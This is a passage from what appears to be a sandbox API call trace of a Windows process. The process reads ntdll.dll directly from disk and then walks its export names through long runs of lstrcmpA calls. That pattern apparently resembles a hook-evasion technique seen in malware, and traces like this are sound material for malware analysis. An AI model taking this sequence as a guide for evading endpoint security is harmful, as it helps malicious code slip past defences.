(HeapHandle=0x480000, Flags=0x0, Size=0x142d00) returned 0x4108040 [0222.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0222.956] ReadFile (in: hFile=0x140, lpBuffer=0x4108040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4108040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0222.977] CloseHandle (hObject=0x140) returned 1 [0223.761] GetProcessHeap () returned 0x480000 [0223.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4108040 | out: hHeap=0x480000) returned 1 [0223.767] GetProcessHeap () returned 0x480000 [0223.767] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499a40 [0223.767] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0223.767] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0223.768] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0223.768] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0223.768] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0223.768] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0223.768] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0223.768] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0223.768] GetProcessHeap () returned 0x480000 [0223.768] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1bba48) returned 0x4101040 [0223.773] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0223.773] ReadFile (in: hFile=0x140, lpBuffer=0x4101040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4101040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0225.307] CloseHandle (hObject=0x140) returned 1 [0225.308] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0225.308] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0225.308] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0225.308] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0225.308] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0225.308] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0225.308] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0225.308] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0225.308] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0225.308] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0225.308] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0225.308] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0225.308] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0225.308] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.308] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0225.308] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0225.309] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.309] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.310] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0225.310] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0225.310] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0225.310] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.311] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.311] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0225.311] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0225.311] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0225.311] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.311] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0225.312] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.313] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.313] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.314] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0225.314] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0225.314] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0225.314] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0225.314] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.314] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0225.315] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0225.315] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 